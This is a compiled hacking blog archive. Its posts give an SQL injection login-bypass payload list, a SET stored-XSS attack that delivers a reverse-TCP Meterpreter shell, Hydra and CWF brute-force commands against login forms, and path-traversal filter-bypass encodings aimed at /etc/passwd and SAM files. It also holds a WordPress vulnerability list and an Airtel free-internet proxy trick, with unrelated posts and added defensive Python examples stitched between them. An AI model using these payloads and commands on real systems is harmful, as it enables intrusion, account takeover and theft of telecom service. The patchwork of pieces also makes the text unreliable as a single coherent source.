Saturday, March 1, 2014

Sql Injection Authentication bypass cheat sheet



This list can be used by hackers when testing for SQL injection authentication bypass. A hacker can use it manually or through Burp in order to automate the process. If you have any other suggestions, please feel free to leave a comment in order to improve and expand the list.


or 1=1
or 1=1--
or 1=1#
or 1=1/*
admin' --
admin' #
admin'/*
admin' or '1'='1
admin' or '1'='1'--
admin' or '1'='1'#
admin' or '1'='1'/*
admin'or 1=1 or ''='
admin' or 1=1
admin' or 1=1--
admin' or 1=1#
admin' or 1=1/*
admin') or ('1'='1
admin') or ('1'='1'--
admin') or ('1'='1'#
admin') or ('1'='1'/*
admin') or '1'='1
admin') or '1'='1'--
admin') or '1'='1'#
admin') or '1'='1'/*
1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055
admin" --
admin" #
admin"/*
admin" or "1"="1
admin" or "1"="1"--
admin" or "1"="1"#
admin" or "1"="1"/*
admin"or 1=1 or ""="
admin" or 1=1
admin" or 1=1--
admin" or 1=1#
admin" or 1=1/*
admin") or ("1"="1
admin") or ("1"="1"--
admin") or ("1"="1"#
admin") or ("1"="1"/*
admin") or "1"="1
admin") or "1"="1"--
admin") or "1"="1"#
admin") or "1"="1"/*
1234 " AND 1=0 UNION ALL SELECT "admin", "81dc9bdb52d04dc20036dbd8313ed055
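As an added example (not part of the cheat sheet or the original post), the Python below shows the login query shape these payloads target, beside the parameterised form that defeats them. The in-memory SQLite database, the "admin" user and its password are constructed for the demo; MD5 is used only to mirror the hash format in the UNION payloads above and is not a recommended password hash.

```python
import hashlib
import sqlite3


def build_db():
    """Constructed demo database: one user 'admin' with an MD5 password hash."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.execute("INSERT INTO users VALUES (?, ?)",
                 ("admin", hashlib.md5(b"s3cret").hexdigest()))
    conn.commit()
    return conn


def login_vulnerable(conn, username, password):
    """String-concatenated query: the bug every payload in the list exploits.
    The quote in the username closes the string literal, and the rest of the
    input is parsed as SQL (an OR clause, or a comment that drops the
    password check)."""
    pw_hash = hashlib.md5(password.encode()).hexdigest()
    query = ("SELECT username FROM users WHERE username = '%s' "
             "AND password = '%s'" % (username, pw_hash))
    row = conn.execute(query).fetchone()
    return row[0] if row else None


def login_safe(conn, username, password):
    """Parameterised query: the driver binds the input as data, so a quote or
    comment sequence in the username is just characters to compare against."""
    pw_hash = hashlib.md5(password.encode()).hexdigest()
    row = conn.execute(
        "SELECT username FROM users WHERE username = ? AND password = ?",
        (username, pw_hash)).fetchone()
    return row[0] if row else None


if __name__ == "__main__":
    conn = build_db()
    for payload in ("admin' --", "admin' or '1'='1"):
        print("%-20r vulnerable=%r safe=%r" % (
            payload, login_vulnerable(conn, payload, "wrong"),
            login_safe(conn, payload, "wrong")))
```

Only the `--` and `OR '1'='1` variants are exercised because SQLite does not treat `#` as a comment; the MySQL-style `#` payloads behave the same way against a MySQL backend built with the same string concatenation.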

How to exploit stored xss using S.E.T?

 
 
Stored XSS is the most dangerous type of cross-site scripting, because a user can be exploited just by visiting the web page where the vulnerability occurs. Also, if that user happens to be the administrator of the website, this can lead to compromise of the web application, which is one of the reasons the risk is higher than with reflected XSS.

(1)First, I recommend you view “How to find XSS in a website?” here.

(2)Open terminal & type following code in terminal.
sudo bash
cd /opt/set
./set
(3)Now select option 1 which is Social-Engineering Attacks.
(4)Select option 2 which is website attack vector.
(5)Select option 3 which is Java Applet Attack Method.
(6)Select option 1, web templates.
(7)Select option 1 java Required.
(8)Now we will select the payload & encoder. So we select simple Windows Reverse_TCP Meterpreter & shikata_ga_nai encoding.
(9)Put listener port: 443. Now Metasploit will open.
(10)Now we can go back to the web application and try to insert the malicious JavaScript code in the comment field that we already know from before is vulnerable to XSS.
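As an added example (not code from the original post or from SET), the Python below shows the comment-field defect that step 10 relies on and its fix: a comment stored verbatim and echoed into the page unescaped runs for every visitor, while escaping on output displays the same text harmlessly. The comment store and the sample comment are constructed for the demo.

```python
import html


def store_comment(comments, text):
    """The 'stored' half: the comment is persisted exactly as submitted.
    Storing raw text is fine; the bug is in how it is rendered later."""
    comments.append(text)
    return len(comments)


def render_unsafe(comments):
    """Vulnerable rendering: stored text is concatenated into the page
    verbatim, so a stored <script> tag executes for every visitor,
    administrator included."""
    return "<ul>" + "".join("<li>%s</li>" % c for c in comments) + "</ul>"


def render_safe(comments):
    """Hardened rendering: HTML-escape at output time, so '<', '>', '&' and
    quotes are shown as text and never parsed as markup."""
    return "<ul>" + "".join("<li>%s</li>" % html.escape(c, quote=True)
                            for c in comments) + "</ul>"


def response_headers():
    """Defence in depth: a Content-Security-Policy without 'unsafe-inline'
    keeps an injected inline script from running even if one rendering path
    forgets to escape."""
    return {
        "Content-Type": "text/html; charset=utf-8",
        "Content-Security-Policy": "default-src 'self'; script-src 'self'",
    }


if __name__ == "__main__":
    comments = []
    store_comment(comments, "nice post")
    store_comment(comments, "<script>alert(1)</script>")  # constructed sample
    print(render_unsafe(comments))
    print(render_safe(comments))
```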

Web application and audit framework





What is BRUTE-FORCE attack ?

A password attack that does not attempt to decrypt any information, but continues to try different passwords. For example, a brute-force attack may have a dictionary of all words or a listing of commonly used passwords. To gain access to an account using a brute-force attack, a program tries all available words it has to gain access to the account. Another type of brute-force attack is a program that runs through all letters, or letters and numbers, until it gets a match.

How to install THC-hydra ?

Open your terminal & type following command

(1)sudo bash

(2)wget http://freeworld.thc.org/releases/hydra-6.3-src.tar.gz

(3)After downloading, extract the archive

tar -xvf hydra-6.3-src.tar.gz

(4)cd hydra-6.3-src

(5)./configure && make

(6)make install


How to use THC-hydra?

If you are attacking an FTP service, then first make sure to run an nmap scan for any open FTP ports (by default it should be 21).

Now, in order to brute-force a specific login form, you need to define the username (if you don't know it, include a file containing some), the wordlist, the service you are attacking and the form method, and the page itself.

Type following command in terminal

./hydra -l admin -P /root/Words.txt site.com http-post-form "/login.php:username=^USER^&password=^PASS^:F=LOGIN_FAILED_TEXT"

The http-post-form argument is three colon-separated fields: the login page, the POST body with the ^USER^ and ^PASS^ placeholders, and the text the page returns on a failed login (replace LOGIN_FAILED_TEXT with the message the site actually shows).

The -l switch defines the username and the capital -L a list of usernames for the brute-force attack (if you don't know the login).

The -p switch defines a single password and the capital -P the password wordlist (-P is used almost always).

If we're attacking a web form over http and the method is post then we use "http-post-form" if the service is FTP simply use "ftp".

Another thing you should be aware of is that the variables username and password are not always named the same. They differ depending on the code.

They could be usr, pwd, etc.; they are not necessarily called "username" & "password" as in most cases. Just view the source and make sure what their names are.

Now there are a lot more options in Hydra. I'll explain some of them below, even though they are included in Hydra's man page.

-vV - The verbose mode. This mode shows you every login attempt hydra tries.

-s - We specify the port on which we're running our attack.

-x - For brute-force parameters generation. We define our charset and minimum & maximum length of it.

-R - Restores a previously aborted session of an attack.

-e ns - Checks for blank or no password fields.
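As an added example (mine, not from the Hydra project or the original post), the Python below looks at the same activity from the defender's side: it parses web-server access log lines in combined log format and flags any source address that POSTs to the login page at least a threshold number of times inside a sliding time window, which is the footprint a wordlist run like the command above leaves in the log. The log lines, addresses and the /login.php path are constructed; the threshold and window are parameters to tune for your own traffic.

```python
import re
from collections import defaultdict, deque
from datetime import datetime

# Combined log format: ip ident user [timestamp] "METHOD path proto" status size
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+)[^"]*" (?P<status>\d{3})')


def parse_line(line):
    """Return a dict with ip, ts (aware datetime), method, path, status, or None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], "%d/%b/%Y:%H:%M:%S %z")
    rec["status"] = int(rec["status"])
    return rec


def detect_login_bursts(lines, login_path="/login.php", threshold=10,
                        window_seconds=60):
    """Flag addresses that POST to login_path at least `threshold` times within
    any `window_seconds` window. Lines are assumed to be in time order per
    address. Returns {ip: peak number of attempts seen inside one window}."""
    recent = defaultdict(deque)   # ip -> timestamps of login POSTs in window
    flagged = {}
    for line in lines:
        rec = parse_line(line)
        if rec is None or rec["method"] != "POST" or rec["path"] != login_path:
            continue
        window = recent[rec["ip"]]
        window.append(rec["ts"])
        while (rec["ts"] - window[0]).total_seconds() > window_seconds:
            window.popleft()
        if len(window) >= threshold:
            flagged[rec["ip"]] = max(flagged.get(rec["ip"], 0), len(window))
    return flagged


def sample_log():
    """Constructed sample: 12 login POSTs from one address inside three
    seconds (a wordlist run), mixed with an ordinary user's traffic."""
    fmt = '{ip} - - [01/Mar/2014:10:00:{s:02d} +0000] "{m} {p} HTTP/1.1" {st} 512'
    burst = [fmt.format(ip="203.0.113.7", s=i // 4, m="POST", p="/login.php", st=200)
             for i in range(12)]
    normal = [fmt.format(ip="198.51.100.3", s=5, m="GET", p="/index.php", st=200),
              fmt.format(ip="198.51.100.3", s=9, m="POST", p="/login.php", st=302),
              fmt.format(ip="198.51.100.3", s=40, m="POST", p="/login.php", st=302)]
    return burst + normal


if __name__ == "__main__":
    for ip, peak in detect_login_bursts(sample_log()).items():
        print("possible brute force from %s: %d login POSTs in one window" % (ip, peak))
```

Counting POSTs rather than failed status codes keeps the check independent of how the application signals a bad login (many forms return 200 with an error message, as the -M option in the later post shows), which is also why a rate-based rule is the first thing to alert on.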

Path traversal vulnerabilities Tutorial



Path traversal vulnerabilities arise when user-controllable data is used by the application to access files and directories on the application server or other back-end file system in an unsafe way. By submitting crafted input, an attacker exploiting path traversal may be able to cause arbitrary content to be read from, or written to, anywhere on the file system being accessed. This often enables an attacker to read sensitive information from the server, or overwrite sensitive files, leading ultimately to arbitrary command execution on the server.

Consider the following example, in which an application uses a dynamic page to return static images to the client. The name of the requested image is specified in a query string parameter:

https://wahh-app.com/scripts/GetImage.aspx?file=diagram1.jpg

When the server processes this request, it performs the following steps:

1. Extracts the value of the file parameter from the query string.

2. Appends this value to the prefix C:\wahh-app\images\.

3. Opens the file with this name.

4. Reads the file’s contents and returns it to the client.

The vulnerability arises because an attacker can place path traversal sequences into the file name in order to backtrack up from the image directory specified in step 2 and so access files from anywhere on the server. The path traversal sequence is known as “dot-dot-slash,” and a typical attack would look like this:

https://wahh-app.com/scripts/GetImage.aspx?file=..\..\windows\repair\sam

When the application appends the value of the file parameter to the name of the images directory, it obtains the following path:

C:\wahh-app\images\..\..\windows\repair\sam

The two traversal sequences effectively step back up from the images directory to the root of the C: drive, and so the preceding path is equivalent to this: C:\windows\repair\sam

Hence, instead of returning an image file, the server actually returns the repair copy of the Windows SAM file. This file may be analyzed by the attacker to obtain usernames and passwords for the server operating system.

In this simple example, the application implements no defenses to prevent path traversal attacks. However, because these attacks have been widely known about for some time, it is common to encounter applications that implement various defenses against them, often based on input validation filters. As you will see, these filters are often poorly designed and can be bypassed by a skilled attacker.

How to bypass filters in path traversal attacks?

If your initial attempts to perform a traversal attack, as described previously, are unsuccessful, this does not mean that the application is not vulnerable. Many application developers are aware of path traversal vulnerabilities and implement various kinds of input validation checks in an attempt to prevent them. However, those defenses are often flawed and can be bypassed by a skilled attacker.

The first type of input filter commonly encountered involves checking whether the filename parameter contains any path traversal sequences, and if so, either rejects the request or attempts to sanitize the input to remove the sequences. This type of filter is often vulnerable to various attacks that use alternative encodings and other tricks to defeat the filter. These attacks all exploit the type of canonicalization problems faced by input validation mechanisms.

Always try path traversal sequences using both forward slashes and backslashes. Many input filters check for only one of these, when the file system may support both.

Try simple URL-encoded representations of traversal sequences, using the following encodings. Be sure to encode every single slash and dot within your input:

dot            %2e
forward slash  %2f
backslash      %5c

Try using 16-bit Unicode encoding:

dot            %u002e
forward slash  %u2215
backslash      %u2216

Try double URL-encoding:

dot            %252e
forward slash  %252f
backslash      %255c

Try overlong UTF-8 Unicode encoding:

dot            %c0%2e   %e0%40%ae   %c0ae    etc.
forward slash  %c0%af   %e0%80%af   %c0%2f   etc.
backslash      %c0%5c   %c0%80%5c   etc.

You can use the illegal Unicode payload type within Burp Intruder to generate a huge number of alternate representations of any given character, and submit this at the relevant place within your target parameter. These are representations that strictly violate the rules for Unicode representation but are nevertheless accepted by many implementations of Unicode decoders, particularly on the Windows platform.

If the application is attempting to sanitize user input by removing traversal sequences, and does not apply this filter recursively, then it may be possible to bypass the filter by placing one sequence within another. For example:

....//

....\/

..../\

....\\

The second type of input filter commonly encountered in defenses against path traversal attacks involves verifying whether the user-supplied filename contains a suffix (i.e., file type) or prefix (i.e., starting directory) that the application is expecting.

Some applications check whether the user-supplied file name ends in a particular file type or set of file types, and reject attempts to access anything else. Sometimes this check can be subverted by placing a URL-encoded null byte at the end of your requested filename, followed by a file type that the application accepts.

For example:


../../../../../boot.ini%00.jpg

The reason this attack sometimes succeeds is that the file type check is implemented using an API in a managed execution environment in which strings are permitted to contain null characters (such as String.endsWith() in Java). However, when the file is actually retrieved, the application ultimately uses an API in an unmanaged environment in which strings are null-terminated, and so your file name is effectively truncated to your desired value.

A different attack against file type filtering is to use a URL-encoded newline character. Some methods of file retrieval (usually on Unix-based platforms) may effectively truncate your file name when a newline is encountered:

../../../../../etc/passwd%0a.jpg

Some applications attempt to control the file type being accessed by appending their own file type suffix to the filename supplied by the user. In this situation, either of the preceding exploits may be effective, for the same reasons.

Some applications check whether the user-supplied file name starts with a particular subdirectory of the start directory, or even a specific file name. This check can of course be trivially bypassed as follows:

wahh-app/images/../../../../../../../etc/passwd

If none of the preceding attacks against input filters are successful individually, it may be that the application is implementing multiple types of filters, and so you need to combine several of these attacks simultaneously (both against traversal sequence filters and file type or directory filters). If possible, the best approach here is to try to break the problem down into separate stages. For example, if the request for

diagram1.jpg

is successful, but the request for

foo/../diagram1.jpg

fails, then try all of the possible traversal sequence bypasses until a variation on the second request is successful. If these successful traversal sequence bypasses don’t enable you to access /etc/passwd, probe whether any file type filtering is implemented and can be bypassed, by requesting

diagram1.jpg.jpg

Working entirely within the start directory defined by the application, try to probe to understand all of the filters being implemented, and see whether each can be bypassed individually with the techniques described.

Of course, if you have white box access to the application, then your task is much easier, because you can systematically work through different types of input and verify conclusively what filename (if any) is actually reaching the file system.
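As an added example (not from the original tutorial, and not the code of any real application), the Python below is the server-side counterpart to the GetImage.aspx walkthrough and the filter-bypass list: a file lookup that decodes the parameter exactly once, rejects what the bypasses depend on (a second encoding layer, invalid or overlong UTF-8, %u sequences, null bytes, newlines, backslashes), then canonicalises the path and checks that it is still inside the image directory before doing a file-type check on the canonical name rather than on the raw input. The image directory, the files in it and every test input are constructed; the allowed extensions are an assumption for the demo.

```python
import os
import tempfile
import urllib.parse

ALLOWED_EXT = {".jpg", ".jpeg", ".png", ".gif"}   # assumed whitelist for the demo


def decode_once(value):
    """Undo exactly one layer of URL-encoding, as the web server would, and
    return None for anything the bypass list relies on: a '%' surviving the
    decode (double encoding, or %u sequences which are left undecoded),
    overlong/invalid UTF-8 (strict decoding rejects %c0%af), NUL, newline."""
    try:
        decoded = urllib.parse.unquote_to_bytes(value).decode("utf-8")
    except UnicodeDecodeError:
        return None
    if any(ch in decoded for ch in ("%", "\x00", "\n", "\r")):
        return None
    return decoded


def safe_image_path(base_dir, user_value):
    """Return the canonical path of an existing image inside base_dir, or None.
    The containment check after canonicalisation is the real defence; the
    separator and '..' checks before it only reject the obvious cases early."""
    decoded = decode_once(user_value)
    if decoded is None or "\\" in decoded:
        return None
    if ".." in decoded.split("/"):
        return None
    base_real = os.path.realpath(base_dir)
    target = os.path.realpath(os.path.join(base_real, decoded))
    if os.path.commonpath([base_real, target]) != base_real:
        return None                      # traversal escaped the image directory
    if os.path.splitext(target)[1].lower() not in ALLOWED_EXT:
        return None                      # type check on the canonical name
    if not os.path.isfile(target):
        return None
    return target


def make_demo_tree():
    """Constructed layout: <root>/images/diagram1.jpg plus a file outside images."""
    root = tempfile.mkdtemp()
    images = os.path.join(root, "images")
    os.mkdir(images)
    with open(os.path.join(images, "diagram1.jpg"), "wb") as f:
        f.write(b"\xff\xd8demo")
    with open(os.path.join(root, "secret.txt"), "w") as f:
        f.write("not an image")
    return root, images


# Inputs from the tutorial above (plus a few variants), all of which must be refused.
REJECTED_INPUTS = [
    "..\\..\\windows\\repair\\sam",           # backslash traversal
    "../../../../../etc/passwd",              # plain dot-dot-slash
    "%2e%2e%2f%2e%2e%2fetc%2fpasswd",         # URL-encoded
    "%252e%252e%252fetc%252fpasswd",          # double URL-encoded
    "%c0%ae%c0%ae%c0%afetc",                  # overlong UTF-8
    "..%u2215..%u2215etc",                    # 16-bit Unicode sequences
    "../../../../../boot.ini%00.jpg",         # null-byte suffix trick
    "../../../../../etc/passwd%0a.jpg",       # newline suffix trick
    "....//....//diagram1.jpg",               # nested sequence (stays inside, but no such file)
    "images/../../../../etc/passwd",          # expected-prefix bypass
    "../secret.txt",                          # real file just outside the base
    "/etc/passwd",                            # absolute path
]

if __name__ == "__main__":
    root, images = make_demo_tree()
    print("allowed:", safe_image_path(images, "diagram1.jpg"))
    for value in REJECTED_INPUTS:
        print("%-36r -> %r" % (value, safe_image_path(images, value)))
```

For a parameter that is only ever meant to name a file in one directory, an even simpler rule is to accept a bare filename with no separators at all; the canonicalise-then-contain check is the one that still holds when the application genuinely needs subdirectories.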

 

How to Solve problem of wpscan in Backtrack 5 r3?

 

WPScan is a WordPress security scanner which is pre-installed in BackTrack 5, but it is an outdated version, so when you try to update it you may face some problems. Here is the solution which worked for me.
cd /pentest/web
rm -rf wpscan
git clone https://github.com/wpscanteam/wpscan.git
cd wpscan
gem install bundler && bundle install --without test development
apt-get install libxml2 libxml2-dev libxslt1-dev
gem install  bundler
bundle install
ruby ./wpscan.rb

 

How to exploit Directory traversal vulnerability?


BackTrack has lots of tools for web-application testing. Directory traversal is one of the critical vulnerabilities in web applications. Previously I posted about what directory traversal is & how to bypass its filters, but that process is manual and can consume lots of time. In BackTrack, however, an automated tool is available for this test, which is DotDotPwn.

If you are on other distro , then you can download it form here.

It's a very flexible intelligent fuzzer to discover directory traversal vulnerabilities in software such as HTTP/FTP/TFTP servers, web platforms such as CMSs, ERPs, blogs, etc.

Also, it has a protocol-independent module to send the desired payload to the host and port specified. On the other hand, it can also be used in a scripting way using the STDOUT module.

It's written in the Perl programming language and can be run either under *NIX or Windows platforms. It's the first Mexican tool included in BackTrack Linux (BT4 R2).

Fuzzing modules supported in this version: 
- HTTP
- HTTP URL
- FTP
- TFTP
- Payload (Protocol independent)
- STDOUT

website hack _ Hacking & Tricks word-press


List of vulnerabilities in WordPress 3.5.1

 
Recently Truecaller and Tango Messenger were hacked by the Syrian Electronic Army, and a large amount of database content was stolen. Now what is common to these sites? They run WordPress 3.5.1, which is vulnerable to some attacks.
A weakness and multiple vulnerabilities have been reported in WordPress, which can be exploited by malicious users to disclose certain system information and bypass certain security restrictions, and by malicious people to conduct spoofing and cross-site scripting attacks, bypass certain security restrictions, and cause a DoS (Denial of Service).

1) An error when calculating the hash cycle count within the "crypt_private()" method in /wp-includes/class-phpass.php can be exploited to exhaust CPU and memory resources by sending HTTP requests with a specially crafted password cookie.

Successful exploitation of this vulnerability requires knowledge of the URL for a password-protected post.

This vulnerability is confirmed in version 3.5.1. Prior versions may also be affected.



Full details & exploitation are available at this link.
 
 
2) An unspecified error within the HTTP API related to server-side requests can be exploited to gain access to the site.
Full details are available at this link.
 
 
3) An unspecified error can be exploited to bypass certain restrictions when publishing posts.
 
Successful exploitation requires the "Contributor" role.

4) An unspecified error can be exploited to reassign the post authorship.

5) Certain input related to SWFUpload is not properly sanitised before being returned to the user. This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.

Build a Facebook-like social networking site with WordPress.


Build your own area-based, school-based, organization- or group-based site with WordPress. On Facebook we see that as soon as opinions differ, blocking gets used, and your hard-written post gets reported and removed. This time, build the social site yourself, where you are the authority or the moderator.


Access will be only for your fans, or the boys from your area, or someone from your organization. So let's begin. The first thing you will need for this is an installed WordPress site.

I am assuming you have already set one up or have one. Now download the plugin called BuddyPress, or go to Add New in your plugin options and search for BuddyPress in the search box.

BuddyPress Download

Now activate the plugin and go to Settings > BuddyPress.

Now activate whichever features you want. In my opinion, to get everything a social network needs, it is right to activate all the options.

Now download this theme from here

Ibuddy themes

Now activate the theme. Then go to Appearance > Theme Options, then to Advanced settings, tick both options and save, so that nobody except registered users can enter the main site, i.e. one must log in to enter the site.

Now go to Pages > Add New. Enter the name Home. Then select Home from Template and publish.

Now go to Settings > Reading. In the Front page displays option select A static page (select below). Below that, from Front page: select the Home page.

That's it, the social networking site is done. If you want, you can develop the site further. Suppose your organization's form number should appear in every member's profile; for this you need a field. You can customize this too from the user profile fields.

airTel 3G unlimited free net for p.c user






Assalamu alaikum...

How is everyone??

Some traitor removed all the good posts on TrickBD, so the posts have to be made again...

Please follow the rules below...
1. Nobody should download any bad file...
2. Do not pass it off under your own name anywhere...

First activate a net package on your Airtel SIM.
I would suggest taking the 20 MB package for 30 taka, because by activating this package you can use it free for 15 days. (2G user)
Or buy the 20 MB 3G pack for 34 taka...
To activate the package dial *121*7#. If you activate a 3G package, those who have 3G in their area will get 3G speed :D

Then download the file below
airTel free for pc user

Configure the modem with apn=wap...

Then open simple server .exe and keep it minimized

In Mozilla go to Options > Advanced > Settings and set the settings as below
Proxy:127.0.0.1
port:8080

Other software also has to be connected through this proxy...
idm...
Done, now keep using unlimited free at awesome speed...

Find TrickBD on Facebook

Wednesday, February 26, 2014

****Brute Force Attack to Crack Website Admin Password****


Hello friends, this is an exclusive post of Hack w0rm by The 3XPloiters & Hack w0rm Team; really, you are going to love this post. So be ready for something new. I've already posted "Brute force attack to hack G-mail Passwords" & I got great success with it. So now I'll show you how you can brute force web forms & hack (crack) a website admin password.

What is Brute Force Attack ?
A password attack that continues to try different passwords. For example, a brute-force attack may have a dictionary of all words or a listing of commonly used passwords. To gain access to an account using a brute-force attack, a program tries all available words it has to gain access to the account. Brute force attacks are commonly used to gain access to software/programs or any web content, server, account etc.

Requirements :
Brute Force attack Tutorial :
First of all: This is completely for educational purposes only; as you know, we're ethical hackers - we always use a penetration testing lab to learn, exploit, create, teach & research.

1. I'm using the DVWA pen-test lab for this tutorial. Suppose I'm a user at the DVWA website with the username gordonb & password abc123, & my task is to hack the website admin password. Here we go...!

2. Cool! Now download the Tamper Data add-on for Firefox [Download] & start Tamper Data.

3. Now go back to the login page of DVWA & log in with username gordonb & password abc123.

4. Now you'll get a pop-up from Tamper; just uncheck the [Continue Tampering] option & click on Submit.

5. After submitting you'll be in your account, so now check Tamper Data, click on [First Result] & copy the POSTDATA value.

6. So now we have the login commands. Copy that POSTDATA & save it in Notepad. Log out, come back to the login page and enter username admin & password anything; obviously you'll not get into the admin account, so let's use some evil minds.

7. After entering the wrong username & password you'll get an error message, Login Failed. Copy that text and save it into Notepad with the previous POSTDATA text.


8. It's time for the brute force attack to get into the admin account. Start BackTrack or Kali Linux; I'm using BackTrack 5.

9. Start a terminal & type mkdir /pentest/passwords/cwf and hit Enter.

10. Now download this small file called CWF Web Form Bruter and copy the complete file into /pentest/passwords/cwf.

11. Back in the terminal, type cd /pentest/passwords/cwf and hit Enter, then ls -l and hit Enter. Now uncompress the file with tar xovfz cwf.tar.gz, and as the last command chmod 700 crack_web_form.pl.

12. If you want more information about this cracking application you can type ./crack_web_form.pl -help.

13. Okay, let's set up some text and attack. Copy the command below into the same terminal & hit Enter [change the IP address to your DVWA IP]:
  • ./crack_web_form.pl -U admin -http "http://192.168.32.128/dvwa/login.php" -data "username=USERNAME&password=PASSWORD&Login=Login" -M "Failed Login"
14. It will start the brute force attack; wait some minutes and check the result, & if you're lucky you'll get a success message.

15. Brute Force Attack [Success]

Hope you liked our post; please share it, & always feel free to comment and let me know your problems. Stay connected with us for more hacky, cracky, ethical stuff..!
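As an added example (not part of the post, and not DVWA's or the CWF script's code), the Python below is the login-side control that makes the attack above stop working: the bruter depends on an unlimited number of attempts and on a recognisable failure string, so a login guard that throttles per username and per source address after a few failures, and returns one generic message for every failure, removes both. The clock is injectable so the behaviour is reproducible; usernames, addresses and limits are constructed for the demo, and password checking itself is left to the caller.

```python
import time
from collections import defaultdict

GENERIC_MESSAGE = "Invalid username or password"   # same text for every failure


class LoginGuard:
    """Tracks recent failures per username and per source address and refuses
    further attempts (even with the right password) once either key has hit
    the limit inside the lockout window."""

    def __init__(self, max_failures=5, lockout_seconds=900, clock=time.monotonic):
        self.max_failures = max_failures
        self.lockout = lockout_seconds
        self.clock = clock
        self.failures = defaultdict(list)   # key -> timestamps of recent failures

    def _recent(self, key, now):
        self.failures[key] = [t for t in self.failures[key] if now - t < self.lockout]
        return self.failures[key]

    def is_locked(self, key, now=None):
        now = self.clock() if now is None else now
        return len(self._recent(key, now)) >= self.max_failures

    def attempt(self, username, source_ip, password_ok):
        """Record one login attempt. `password_ok` is the result of the real
        credential check, which the caller performs; the guard only decides
        whether the outcome may be honoured and what message goes back."""
        now = self.clock()
        keys = ("user:" + username, "ip:" + source_ip)
        if any(self.is_locked(k, now) for k in keys):
            return {"ok": False, "throttled": True, "message": GENERIC_MESSAGE}
        if password_ok:
            # Clear the user's counter only; clearing the address counter
            # would let a scanner reset itself by logging into its own account.
            self.failures.pop("user:" + username, None)
            return {"ok": True, "throttled": False, "message": ""}
        for k in keys:
            self.failures[k].append(now)
        return {"ok": False, "throttled": False, "message": GENERIC_MESSAGE}


if __name__ == "__main__":
    guard = LoginGuard(max_failures=3, lockout_seconds=60)
    for pw in ("123456", "password", "letmein", "abc123"):   # constructed guesses
        print(pw, guard.attempt("admin", "192.0.2.10", password_ok=False))
    print("correct password, still locked:",
          guard.attempt("admin", "192.0.2.10", password_ok=True))
```

The guard deliberately does not distinguish "no such user" from "wrong password" in its message, and it throttles on the address as well as the account, so guessing many usernames from one machine is slowed just as much as guessing many passwords for one.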